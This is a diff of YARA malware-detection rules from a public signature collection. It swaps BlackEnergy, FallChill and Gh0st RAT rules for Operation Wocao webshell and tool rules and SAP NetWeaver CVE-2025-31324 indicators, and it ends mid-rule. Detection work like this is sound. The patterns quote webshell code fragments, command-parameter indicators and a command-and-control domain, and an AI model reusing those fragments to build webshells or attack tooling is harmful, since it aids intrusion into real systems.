-		$a = /\x13\s*DDE\b[^\x14]+/ nocase
-		$r1 = { 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 }
-		$r2 = "Adobe ARM Installer"
+		$a = "[+] Work completed." ascii wide
+		$b = "[-] Create a new file failed." ascii wide
+		$c = "[-] This is not a correct path." ascii wide
+		$d = "%s [TargetPath] <Num> <SavePath>" ascii wide
+		$e = "D\t%ld\t%ld\t%ld\t%d\t%d\t%s\t" ascii wide
+		$f = "D\t%ld\t%ld\t%ld\t-1\t%d\t%s\t" ascii wide
+		$g = "%s\t%ld\t%ld\t%ld\t%I64d\t%d\t%s\t%s" ascii wide
 
 	condition:
-		uint32be( 0 ) == 0xD0CF11E0 and $a and not 1 of ( $r* )
+		1 of them
 }
-rule SIGNATURE_BASE_Blackenergy3_Installer
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Checkadmin_Bin
 {
 	meta:
-		description = "Matches unique code block for import name construction "
-		author = "Mike Schladt"
-		id = "4afeb7ac-ce8d-506c-9c97-db7ec6102490"
-		date = "2015-05-29"
+		description = "Checkadmin utility"
+		author = "Fox-IT SRT"
+		id = "2f819213-ade1-525b-af18-d77b7fc96093"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy_installer.yar#L2-L16"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L215-L232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "78387651dd9608fcdf6bfb9df8b84db4"
-		hash = "78636f7bbd52ea80d79b4e2a7882403092bbb02d"
-		logic_hash = "c4c562124427fd394b56e48f16f2d262c8a717fc750b955b2b2a35acb478d5e7"
+		logic_hash = "784ec960ce2733aebc404ee5c09bb852eb45553ad167db292d05b82feedbd5a6"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$import_names = { C7 45 D0 75 73 65 72 C7 45 D4 33 32 2E 64 66 C7 45 D8 6C 6C 88 5D DA C7 45 84 61 64 76 61 C7 45 88 70 69 33 32 C7 45 8C 2E 64 6C 6C 88 5D 90 C7 45 B8 77 69 6E 69 C7 45 BC 6E 65 74 2E C7 45 C0 64 6C 6C 00 C7 45 C4 77 73 32 5F C7 45 C8 33 32 2E 64 66 C7 45 CC 6C 6C 88 5D CE C7 45 94 73 68 65 6C C7 45 98 6C 33 32 2E C7 45 9C 64 6C 6C 00 C7 45 E8 70 73 61 70 C7 45 EC 69 2E 64 6C 66 C7 45 F0 6C 00 C7 85 74 FF FF FF 6E 65 74 61 C7 85 78 FF FF FF 70 69 33 32 C7 85 7C FF FF FF 2E 64 6C 6C 88 5D 80 C7 85 64 FF FF FF 6F 6C 65 61 C7 85 68 FF FF FF 75 74 33 32 C7 85 6C FF FF FF 2E 64 6C 6C 88 9D 70 FF FF FF C7 45 DC 6F 6C 65 33 C7 45 E0 32 2E 64 6C 66 C7 45 E4 6C 00 C7 45 A0 76 65 72 73 C7 45 A4 69 6F 6E 2E C7 45 A8 64 6C 6C 00 C7 85 54 FF FF FF 69 6D 61 67 C7 85 58 FF FF FF 65 68 6C 70 C7 85 5C FF FF FF 2E 64 6C 6C 88 9D 60 FF FF FF C7 45 AC 61 70 70 68 C7 45 B0 65 6C 70 2E C7 45 B4 64 6C 6C 00 C7 45 F4 2E 64 6C 6C 88 5D F8 }
+		$a = "[-] %s * A system error has occurred: %d" ascii wide
+		$b = {
+            0D 00 0A 00 25 00 6C 00 64 00 20 00 72 00 65 00
+            73 00 75 00 6C 00 74 00 73 00 2E 00 0D 00 0A 00
+        }
+		$c = "%s\t<Access denied>" ascii wide
 
 	condition:
-		any of them
+		1 of them
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Jul17_2C : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Getos_Py
 {
 	meta:
-		description = "Unspecified Malware - CN relation"
-		author = "Florian Roth (Nextron Systems)"
-		id = "91e760e8-7460-54af-a794-0b41a4b19760"
-		date = "2017-07-18"
+		description = "Python getos utility"
+		author = "Fox-IT SRT"
+		id = "4a731dde-87e4-566a-b559-d23e0bef5841"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/CX3KaY"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_unspecified_malware.yar#L3-L26"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L234-L295"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a078b96ea15b287c8aed960741865aeac356ec8650eac71b8e28f2f1924ec956"
+		logic_hash = "2535c01b703c0fcba43e771832db8cd969e4a4b112ef28e4ddfeac6491ba604c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e8156ec1706716cada6f57b6b8ccc9fb0eb5debe906ac45bdc2b26099695b8f5"
+		tags = ""
 
 	strings:
-		$x1 = "%AllUsersProfile%\\DeviceSync\\m.exe" fullword wide
-		$x2 = "freenow.chickenkiller.com" fullword ascii
-		$x3 = "\\Release\\PhantomNet-SSL.pdb" ascii
-		$s1 = "SELECT * FROM AntiVirusProduct" fullword ascii
-		$s2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%08X-%04X-%04X-%02X%02X%02X%02X" fullword ascii
-		$s3 = "Proxy-Authenticate: Basic" fullword ascii
-		$s4 = "Proxy-Authenticate: NTLM" fullword ascii
-		$s5 = "Root\\SecurityCenter2" fullword wide
-		$s6 = "aaabbbcccddd" fullword ascii
+		$smb_1 = {
+            00 00 00 85 ff 53 4d 42 72 00 00 00 00 18 53 c8
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe
+            00 00 ff b4 00 62 00 02 50 43 20 4e 45 54 57 4f
+            52 4b 20 50 52 4f 47 52 41 4d 20 31 2e 30 00 02
+            4c 41 4e 4d 41 4e 31 2e 30 00 02 57 69 6e 64 6f
+            77 73 20 66 6f 72 20 57 6f 72 6b 67 72 6f 75 70
+            73 20 33 2e 31 61 00 02 4c 4d 31 2e 32 58 30 30
+            32 00 02 4c 41 4e 4d 41 4e 32 2e 31 00 02 4e 54
+            20 4c 4d 20 30 2e 31 32 00
+        }
+		$smb_2 = {
+            00 00 00 c8 ff 53 4d 42 73 00 00 00 00 18 03 c8
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff fe
+            00 00 3f b5 0c ff 00 c8 00 04 11 32 00 00 00 00
+            00 00 00 28 00 00 00 00 00 d4 00 00 a0 8d 00 4e
+            54 4c 4d 53 53 50 00 01 00 00 00 07 82 88 a2 00
+            00 00 00 28 00 00 00 00 00 00 00 28 00 00 00 05
+            01 28 0a 00 00 00 0f 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+            00 00 00 00 00 00 00 00 00 00 00 00
+        }
+		$smbstr_1 = "\\x00\\x00\\x00\\x85\\xffSMBr\\x00\\x00\\x00\\x00\\x18S\\xc8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\\x00\\x00\\xff\\xb4\\x00b\\x00\\x02PC NETWORK PROGRAM 1.0\\x00\\x02LANMAN1.0\\x00\\x02Windows for Workgroups 3.1a\\x00\\x02LM1.2X002\\x00\\x02LANMAN2.1\\x00\\x02NT LM 0.12\\x00"
+		$smbstr_2 = "\\x00\\x00\\x00\\xc8\\xffSMBs\\x00\\x00\\x00\\x00\\x18\\x03\\xc8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\\x00\\x00?\\xb5\\x0c\\xff\\x00\\xc8\\x00\\x04\\x112\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\xd4\\x00\\x00\\xa0\\x8d\\x00NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x07\\x82\\x88\\xa2\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\x00\\x00\\x00\\x05\\x01(\\n\\x00\\x00\\x00\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
+		$code_1 = "return 'Other error.'" ascii wide
+		$code_2 = "sblob = buf[47:47 + sbl]" ascii wide
+		$code_3 = "re.split('[\\x00-,]+', y[-4])" ascii wide
+		$code_4 = "('').join(sblob[off:off + hlen].split('\\x00'))" ascii wide
+		$code_5 = "banner = '%s    %s' % (hostname, native)" ascii wide
+		$code_6 = "banner = '%s\\\\%s    %s' % (dm, hostname, native)" ascii wide
+		$tsk_1 = "PushTask" ascii wide
+		$tsk_2 = "parse_task" ascii wide
+		$tsk_3 = "commit_task" ascii wide
+		$str_1 = "Usage: getos.py <ip-range|ip-file>" ascii wide
+		$str_2 = "The path '%s' write fails." ascii wide
+		$str_3 = "Receive a signal %d," ascii wide
+		$str_4 = "Scan Complete!" ascii wide
+		$str_5 = "line: %d, %s: %s" ascii wide
+		$str_6 = "Other error." ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( all of them )
+		( all of ( $smb_* ) ) or ( all of ( $smbstr_* ) ) or ( 3 of ( $code_* ) ) or ( all of ( $tsk_* ) ) or ( 3 of ( $str_* ) )
 }
-rule SIGNATURE_BASE_TA17_318A_Rc4_Stack_Key_Fallchill : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Info_Vbs
 {
 	meta:
-		description = "HiddenCobra FallChill - rc4_stack_key"
-		author = "US CERT"
-		id = "0a2afcab-f540-592f-aa75-64c0a13d26f3"
-		date = "2017-11-15"
+		description = "Strings from the information grabber VBS"
+		author = "Fox-IT SRT"
+		id = "b719fb31-2836-5faf-a7c8-c361a14df2be"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318A.yar#L10-L21"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L297-L316"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f284cb492ff5242d7bf577580fd95723ef7d3f109c7217a26bbefbbff7150255"
+		logic_hash = "e37f8768c7920b8c3d9fdd6bb3a4e748c47a6c06a8aaed01655355ef3d8c3457"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$stack_key = { 0d 06 09 2a ?? ?? ?? ?? 86 48 86 f7 ?? ?? ?? ?? 0d 01 01 01 ?? ?? ?? ?? 05 00 03 82 41 8b c9 41 8b d1 49 8b 40 08 48 ff c2 88 4c 02 ff ff c1 81 f9 00 01 00 00 7c eb }
+		$ = "Logger PingConnect"
+		$ = "Logger GetAdmins"
+		$ = "Logger InstallPro"
+		$ = "Logger Exec"
+		$ = "retstr = adminsName & \" Members\" & vbCrLf & _"
+		$ = "Logger VolumeName & \" (\" & objDrive.DriveLetter & \":)\" _"
+		$ = "txtRes = txtRes & machine & \" can"
+		$ = "retstr = \"PID   SID Image Name\" & vbCrLf & \"===="
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $stack_key
+		4 of them
 }
-rule SIGNATURE_BASE_TA17_318A_Success_Fail_Codes_Fallchill : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Console_Jsp
 {
 	meta:
-		description = "HiddenCobra FallChill - success_fail_codes"
-		author = "US CERT"
-		id = "f2390b03-238e-5ae6-af85-e5dd5790362f"
-		date = "2017-11-15"
+		description = "Strings from the console.jsp webshell"
+		author = "Fox-IT SRT"
+		id = "1afdfc34-d2e3-58c7-80ea-ee5632e42469"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318A.yar#L23-L37"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L318-L335"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "73f6b36554d83f7708e9468602e529c4865269d362ebeebf6b355ccf7c2a8686"
+		logic_hash = "e70c15ef10b63a011edbcedc773a8e2917fd915c3ecc273c3bf2b78eb10fc570"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s0 = { 68 7a 34 12 00 }
-		$s1 = { ba 7a 34 12 00 }
-		$f0 = { 68 5c 34 12 00 }
-		$f1 = { ba 5c 34 12 00 }
+		$a = "String strLogo = request.getParameter(\"image\")"
+		$b = "!strLogo.equals(\"web.gif\")"
+		$c = "<font color=red>Save Failed!</font>"
+		$d = "<font color=red>Save Success!</font>"
+		$e = "Save path:<br><input type=text"
+		$f = "if (newfile.exists() && newfile.length()>0) { out.println"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and ( ( $s0 and $f0 ) or ( $s1 and $f1 ) )
+		1 of them
 }
-
-rule SIGNATURE_BASE_Hiddencobra_Fallchill_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Index_Jsp
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5bbeb5ba-93d7-5903-9132-749afe5776ae"
-		date = "2017-11-15"
+		description = "Strings from the index.jsp socket tunnel"
+		author = "Fox-IT SRT"
+		id = "9c226ccd-6c69-523c-bca4-371e55274667"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318A.yar#L51-L77"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L337-L353"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8e6215a81272ea457318dd83eff9e1902c5e1d1a124ff674b145f2dc5e4a3711"
+		logic_hash = "870dad9fb5456f8edbd9f3c2d0b8764cf1143399626ce4df53c93919bcb1a0cb"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a606716355035d4a1ea0b15f3bee30aad41a2c32df28c2d468eafd18361d60d6"
+		tags = ""
 
 	strings:
-		$s1 = "REGSVR32.EXE.MUI" fullword wide
-		$s2 = "Microsoft Corporation. All rights reserved." fullword wide
-		$s3 = "c%sd.e%sc %s > \"%s\" 2>&1" fullword wide
-		$s4 = "\" goto Loop" fullword ascii
-		$e1 = "xolhvhlxpvg" fullword ascii
-		$e2 = "tvgslhgybmanv" fullword ascii
-		$e3 = "CivagvTllosvok32Smakhslg" fullword ascii
-		$e4 = "GvgCfiivmgDrivxglibW" fullword ascii
-		$e5 = "OkvmPilxvhhTlpvm" fullword ascii
+		$x1 = "X-CMD"
+		$x2 = "X-STATUS"
+		$x3 = "X-TARGET"
+		$x4 = "X-ERROR"
+		$a = "out.print(\"All seems fine.\");"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "6135d9bc3591ae7bc72d070eadd31755" or 3 of ( $s* ) or 4 of them )
+		all of ( $x* ) and $a
 }
-
-rule SIGNATURE_BASE_Hiddencobra_Fallchill_2 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Ver_Jsp
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c343e8e4-0785-5a47-99c1-98b189f4aaa0"
-		date = "2017-11-15"
+		description = "Strings from the ver.jsp webshell"
+		author = "Fox-IT SRT"
+		id = "b2828b84-8934-5111-9345-683a07025070"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-318A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_318A.yar#L79-L97"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L355-L372"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ab421bea251ed3fda4304cd180e5c31f7ae55d3d8b26d6cf5f1cf11bacee9b8d"
+		logic_hash = "ada6de4b07a76e79bb17793cda2b51f96554a35992a73f59c360487638ae3be3"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0a118eb23399000d148186b9079fa59caf4c3faa7e7a8f91533e467ac9b6ff41"
+		tags = ""
 
 	strings:
-		$s1 = "%s\\%s.dll" fullword wide
-		$s2 = "yurdkr.dll" fullword ascii
-		$s3 = "c%sd.e%sc %s > \"%s\" 2>&1" fullword wide
+		$a = "String strLogo = request.getParameter(\"id\")"
+		$b = "!strLogo.equals(\"256\")"
+		$c = "boolean chkos = msg.startsWith"
+		$d = "while((c = er.read()) != -1)"
+		$e = "out.print((char)c);}in.close()"
+		$f = "out.print((char)c);}er.close()"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "cb36dcb9909e29a38c387b8a87e7e4ed" or ( 2 of them ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Ghostdragon_Gh0Strat : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Webshell_Webinfo
 {
 	meta:
-		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a74330ab-5249-5125-8f48-27aec7c6eeb4"
-		date = "2016-04-23"
+		description = "Generic strings from webinfo.war webshells"
+		author = "Fox-IT SRT"
+		id = "b8477f62-f3f6-5526-b0e3-9b794fefaa1f"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/the-ghost-dragon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ghostdragon_gh0st_rat.yar#L8-L52"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L374-L394"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b67c7ff76c14e771c4e952a408c2c006c9ae88fda97b775747a95322aff355e7"
+		logic_hash = "711737a56067f24f422cc7d5aeba4389741fe18a0e66f2715fce626c3b6aef19"
 		score = 75
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197"
-		hash2 = "99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2"
-		hash3 = "6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df"
-		hash4 = "b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5"
+		quality = 85
+		tags = ""
 
 	strings:
-		$x1 = "REG ADD HKEY_LOCAL_MACHINE\\%s /v ServiceDll /t REG_EXPAND_SZ /d \"%s\"" fullword ascii
-		$x2 = "Global\\REALCHEL_GLOBAL_SUBMIT_20031020_" ascii
-		$x3 = "\\xclolg2.tmp" ascii
-		$x4 = "Http/1.1 403 Forbidden" fullword ascii
-		$x5 = "%sxsd%d.pif" fullword ascii
-		$x6 = "%s\\%s32.dl_" ascii
-		$x7 = "%-23s %-16s  0x%x(%02d)" fullword ascii
-		$x8 = "RegSetValueEx(start)" fullword ascii
-		$x9 = "%s\\%s64.dl_" ascii
-		$s1 = "viewsc.dll" fullword ascii
-		$s2 = "Proxy-Connection:   Keep-Alive" fullword ascii
-		$s3 = "\\sfc_os.dll" ascii
-		$s4 = "Mozilla/4.0 (compatible)" fullword ascii
-		$s5 = "Http/1.1 403 Forbidden" fullword ascii
-		$s6 = "CONNECT   %s:%d   HTTP/1.1" fullword ascii
-		$s7 = "WindowsUpperVersion" fullword ascii
-		$s8 = "[%d-%d-%d %d:%d:%d] (%s)" fullword ascii
-		$s9 = "SOFTWARE\\Microsoft\\DataAccess\\%s" fullword ascii
-		$s10 = "%s sp%d(%d)" fullword ascii
-		$s11 = "OpenSC ERROR " fullword ascii
-		$s12 = "get rgspath error " fullword ascii
-		$s13 = "Global\\GLOBAL_SUBMIT_0234_" ascii
-		$s14 = "Global\\_vc_ck_ %d" fullword ascii
+		$var1 = "String strLogo = request.getParameter"
+		$var2 = "String content = request.getParameter(\"content\");"
+		$var3 = "String basePath=request.getScheme()"
+		$var4 = "!strLogo.equals("
+		$var5 = "if(path!=null && !path.equals(\"\") && content!=null"
+		$var6 = "File newfile=new File(path);"
+		$str1 = "Save Success!"
+		$str2 = "Save Failed!"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( 6 of them )
+		2 of ( $var* ) or ( all of ( $str* ) and 1 of ( $var* ) )
 }
-rule SIGNATURE_BASE_Ghostdragon_Gh0Strat_Sample2 : FILE
+rule SIGNATURE_BASE_APT_SAP_Netweaver_Exploitation_Activity_Apr25_1 : SCRIPT CVE_2025_31324 FILE
 {
 	meta:
-		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "424cb978-c4d1-5847-8852-e25ec2a02139"
-		date = "2016-04-23"
-		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/the-ghost-dragon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ghostdragon_gh0st_rat.yar#L54-L75"
+		description = "Detects forensic artefacts related to exploitation activity of SAP NetWeaver CVE-2025-31324"
+		author = "Florian Roth"
+		id = "78863492-5c83-55a8-900b-057e99125414"
+		date = "2025-04-25"
+		modified = "2025-05-15"
+		reference = "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sap_netweaver_apr25.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f41776a033be766844c9867902d2ef9b79bf59bdf212f0158eccf79db0810460"
-		score = 75
+		logic_hash = "ab6c5e17bba15a3f968bdbe88a8cf4a039c55b6035d91fd3c6b30092be89af5c"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "71a52058f6b5cef66302c19169f67cf304507b4454cca83e2c36151da8da1d97"
+		tags = "SCRIPT, CVE-2025-31324, FILE"
 
 	strings:
-		$x1 = "AdobeWpk" fullword ascii
-		$x2 = "seekin.dll" fullword ascii
-		$c1 = "Windows NT 6.1; Trident/6.0)" fullword ascii
-		$c2 = "Mozilla/5.0 (compatible; MSIE 10.0; " fullword ascii
+		$x01 = "/helper.jsp?cmd=" ascii wide
+		$x02 = "/cache.jsp?cmd=" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( all of ( $x* ) or all of ( $c* ) ) ) or ( all of them )
+		filesize < 20MB and 1 of them
 }
-rule SIGNATURE_BASE_Ghostdragon_Gh0Strat_Sample3
+rule SIGNATURE_BASE_APT_SAP_Netweaver_Exploitation_Activity_Apr25_2 : SCRIPT CVE_2025_31324 FILE
 {
 	meta:
-		description = "Detects Gh0st RAT mentioned in Cylance' Ghost Dragon Report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6d4bb99d-28de-59c2-b6f0-6da3cac4ed73"
-		date = "2016-04-23"
-		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/the-ghost-dragon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ghostdragon_gh0st_rat.yar#L77-L92"
+		description = "Detects forensic artefacts related to exploitation activity of SAP NetWeaver CVE-2025-31324"
+		author = "Florian Roth"
+		id = "17fb236e-e78c-51e5-b0a8-14964e38dfc5"
+		date = "2025-04-25"
+		modified = "2025-05-15"
+		reference = "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sap_netweaver_apr25.yar#L16-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "39ddb94ac14032f88e54e413ed650277e95f6dcf66219fcf43a01aff1f10a058"
-		score = 75
+		logic_hash = "dfc24a4f359e2bc899ab3924bd342c2c6bd8c757b7c1d3859a47f61b9e4039a9"
+		score = 70
+		quality = 85
+		tags = "SCRIPT, CVE-2025-31324, FILE"
+
+	strings:
+		$x03 = "MSBuild.exe c:\\programdata\\" ascii wide
+
+	condition:
+		filesize < 20MB and 1 of them
+}
+rule SIGNATURE_BASE_SUSP_WEBSHELL_Cmd_Indicator_Apr25
+{
+	meta:
+		description = "Detects a pattern which is often related to web shell activity"
+		author = "Florian Roth"
+		id = "735359b2-9f94-5618-8ec5-7ab8f5e5e16d"
+		date = "2025-04-25"
+		modified = "2025-05-07"
+		reference = "https://regex101.com/r/N6oZ2h/2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_sap_netweaver_apr25.yar#L29-L41"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "b992786a58389749db40fc90363f00c5df374d514374afc2d6fdff4429cb1ec0"
+		score = 60
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1be9c68b31247357328596a388010c9cfffadcb6e9841fb22de8b0dc2d161c42"
 
 	strings:
-		$op1 = { 44 24 15 65 88 54 24 16 c6 44 24 }
-		$op2 = { 44 24 1b 43 c6 44 24 1c 75 88 54 24 1e }
-		$op3 = { 1e 79 c6 44 24 1f 43 c6 44 24 20 75 88 54 24 22 }
